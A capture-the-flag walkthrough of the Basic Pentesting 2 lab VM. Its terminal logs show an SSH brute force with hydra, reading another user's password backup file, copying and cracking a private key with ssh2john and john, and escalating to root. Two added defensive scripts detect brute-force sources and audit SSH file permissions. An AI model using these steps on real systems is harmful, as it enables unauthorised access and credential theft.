Basic Pentesting 2 Walkthrough

We run a network scan with the netdiscover command to find the IP address the target machine has been assigned.

netdiscover -r 192.168.1.0/24

hydra -L users.txt -P parola.txt 192.168.1.21 -t 4 ssh

ssh jan@192.168.1.21
jan@basic2:~$ ls -l
total 0
jan@basic2:~$ pwd
/home/jan
jan@basic2:~$ cd ..
jan@basic2:/home$ ls -l
total 8
drwxr-xr-x 2 root root 4096 Oct 31 09:19 jan
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 kay
jan@basic2:/home$ cd kay/.
./ ../ .cache/ .nano/ .ssh/
jan@basic2:/home$ cd kay/
jan@basic2:/home/kay$ ls -l
total 4
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
jan@basic2:/home/kay$ vim pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
jan@basic2:/home/kay$ ssh kay@192.168.1.21
Could not create directory '/home/jan/.ssh'.
The authenticity of host '192.168.1.21 (192.168.1.21)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
kay@192.168.1.21's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

256 packages can be updated.
166 updates are security updates.

New release '18.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Thu Oct 31 09:20:37 2019 from 192.168.1.21
kay@basic2:~$ sudo su
[sudo] password for kay:
root@basic2:/home/kay# whoami
root@basic2:/home/kay# cat /root/flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain
a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send
me a link! I can be reached at [email protected] If you've got questions or feedback, please reach
out to me.

Happy hacking!
root@basic2:/home/kay#
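The hydra run at the start of this method leaves a distinctive trace on the target. The following script is an added example, not code from the original walkthrough: it counts sshd "Failed password" lines per source IP in auth.log-style input and reports sources at or above a threshold together with how many distinct usernames they tried. The log lines are constructed; the hostname basic2 and the IP addresses in them are assumed.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): the hydra run above seen
# from the target's side. Counts "Failed password" sshd lines per source IP
# and reports sources at or above a threshold, with how many distinct
# usernames they tried. Log lines are constructed; basic2 and IPs are assumed.

# Usage: ssh_bruteforce_sources LOGFILE THRESHOLD
# Prints "ip failures distinct_users" for each source with >= THRESHOLD failures.
ssh_bruteforce_sources() {
    awk -v thr="$2" '
        /sshd\[[0-9]+\]: Failed password for/ {
            # Handles both "for jan from 1.2.3.4" and "for invalid user x from 1.2.3.4"
            for (i = 1; i <= NF; i++)
                if ($i == "from") { ip = $(i + 1); user = $(i - 1) }
            fails[ip]++
            if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        }
        END {
            for (ip in fails)
                if (fails[ip] >= thr)
                    printf "%s %d %d\n", ip, fails[ip], users[ip]
        }' "$1" | sort
}

# Constructed auth.log excerpt: a hydra-style burst from one host that ends in
# an accepted login, next to a single mistyped password from another host.
write_sample_log() {
    cat > "$1" <<'EOF'
Oct 31 09:10:01 basic2 sshd[1201]: Failed password for jan from 192.168.1.50 port 40001 ssh2
Oct 31 09:10:01 basic2 sshd[1202]: Failed password for jan from 192.168.1.50 port 40002 ssh2
Oct 31 09:10:01 basic2 sshd[1203]: Failed password for invalid user admin from 192.168.1.50 port 40003 ssh2
Oct 31 09:10:02 basic2 sshd[1204]: Failed password for jan from 192.168.1.50 port 40004 ssh2
Oct 31 09:10:02 basic2 sshd[1205]: Accepted password for jan from 192.168.1.50 port 40005 ssh2
Oct 31 09:12:40 basic2 sshd[1300]: Failed password for kay from 192.168.1.77 port 51000 ssh2
EOF
}

main() {
    log=$(mktemp)
    write_sample_log "$log"
    ssh_bruteforce_sources "$log" 3   # prints: 192.168.1.50 4 2
    rm -f "$log"
}
main
```

A burst of failures that ends in an "Accepted password" from the same source, as in the sample, is the pattern to alert on: the guess succeeded.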

A Different Method

jan@basic2:~$ cd /home/kay/
jan@basic2:/home/kay$ cd .ssh/
jan@basic2:/home/kay/.ssh$ ls -l
total 12
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub

[email protected]:~# scp [email protected]:/home/kay/.ssh/id_rsa .
[email protected]'s password:
id_rsa 100% 3326 3.4MB/s 00:00
[email protected]:~# chmod 600 id_rsa
[email protected]:~# ssh kay@192.168.1.21 -i id_rsa
Enter passphrase for key 'id_rsa':
kay@192.168.1.21's password:
[email protected]:~# ssh2john id_rsa > parola_crck.txt
bash: ssh2john: command not found
[email protected]:~# locate ssh2john
/usr/share/john/ssh2john.py
[email protected]:~# /usr/share/john/ssh2john.py id_rsa > parola_crck.txt
[email protected]:~# john --format=SSH --wordlist=rockyou.txt id_rsa parola_crck.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (id_rsa)
Warning: Only 1 candidate left, minimum 2 needed for performance.
1g 0:00:00:15 DONE (2019-10-31 13:52) 0.06357g/s 911741p/s 911741c/s 911741C/s *7¡Vamos!
Session completed
[email protected]:~# ssh kay@192.168.1.21 -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

256 packages can be updated.
166 updates are security updates.

New release '18.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Thu Oct 31 09:26:15 2019 from 192.168.1.21
kay@basic2:~$
kay@basic2:~$ sudo -l
[sudo] password for kay:
Sorry, try again.
[sudo] password for kay:
sudo: 1 incorrect password attempt
kay@basic2:~$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Oct 31 09:32 ..
-rw------- 1 kay kay 790 Oct 31 09:29 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$ sudo -l
[sudo] password for kay:
Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL
kay@basic2:~$ sudo su
root@basic2:/home/kay# ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Oct 31 09:32 ..
-rw------- 1 kay kay 790 Oct 31 09:29 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
root@basic2:/home/kay#
root@basic2:/home/kay# cat /root/flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain
a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send
me a link! I can be reached at [email protected] If you've got questions or feedback, please reach
out to me.

Happy hacking!
root@basic2:/home/kay#
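The second method worked because kay's id_rsa was readable by every local user (0644) and, as a related weakness in the same listing, authorized_keys was group-writable (0664). The following audit is an added example, not the walkthrough's own code: it walks a root directory (default /home), reports private keys identified by their PEM header that group or others can read, and reports authorized_keys files that group or others can write. The sample tree it builds is constructed to mirror the listing above.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): audit home directories for
# the two weaknesses the key-based path above relied on, a private key readable
# by other users (kay's id_rsa was 0644) and an authorized_keys that a group
# could append to (kay's was 0664). ROOT defaults to /home; the sample tree
# built by make_sample_tree is constructed for demonstration.

# Usage: audit_ssh_files [ROOT]; prints one "reason path" line per finding.
audit_ssh_files() {
    root=${1:-/home}
    # Private keys identified by PEM header, not by name, with group/other read.
    find "$root" -type f \( -perm -004 -o -perm -040 \) 2>/dev/null |
    while IFS= read -r f; do
        if grep -q -- '-----BEGIN .*PRIVATE KEY-----' "$f" 2>/dev/null; then
            echo "readable-private-key $f"
        fi
    done
    # authorized_keys with group/other write: anyone who can write it can add
    # a key and log in as the owner without knowing any password.
    find "$root" -type f -name authorized_keys \( -perm -002 -o -perm -020 \) 2>/dev/null |
    while IFS= read -r f; do
        echo "writable-authorized-keys $f"
    done
}

# Constructed tree mirroring the listing above: kay's files are too open,
# jan's key is correctly 0600, and a public key must not be reported.
make_sample_tree() {
    t=$1
    mkdir -p "$t/kay/.ssh" "$t/jan/.ssh"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' \
        'constructed-placeholder-not-real-key-material' \
        '-----END RSA PRIVATE KEY-----' > "$t/kay/.ssh/id_rsa"
    printf '%s\n' 'ssh-rsa constructed-placeholder kay@basic2' > "$t/kay/.ssh/id_rsa.pub"
    cp "$t/kay/.ssh/id_rsa.pub" "$t/kay/.ssh/authorized_keys"
    cp "$t/kay/.ssh/id_rsa" "$t/jan/.ssh/id_rsa"
    chmod 644 "$t/kay/.ssh/id_rsa" "$t/kay/.ssh/id_rsa.pub"
    chmod 664 "$t/kay/.ssh/authorized_keys"
    chmod 600 "$t/jan/.ssh/id_rsa"
}

main() {
    tree=$(mktemp -d)
    make_sample_tree "$tree"
    audit_ssh_files "$tree"   # reports kay's id_rsa and authorized_keys only
    rm -rf "$tree"
}
main
```

Run it against the real /home as root to cover every user's files; a passphrase on the key (beeswax above) does not change the finding, since the session above shows a weak passphrase falls to a wordlist in seconds.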
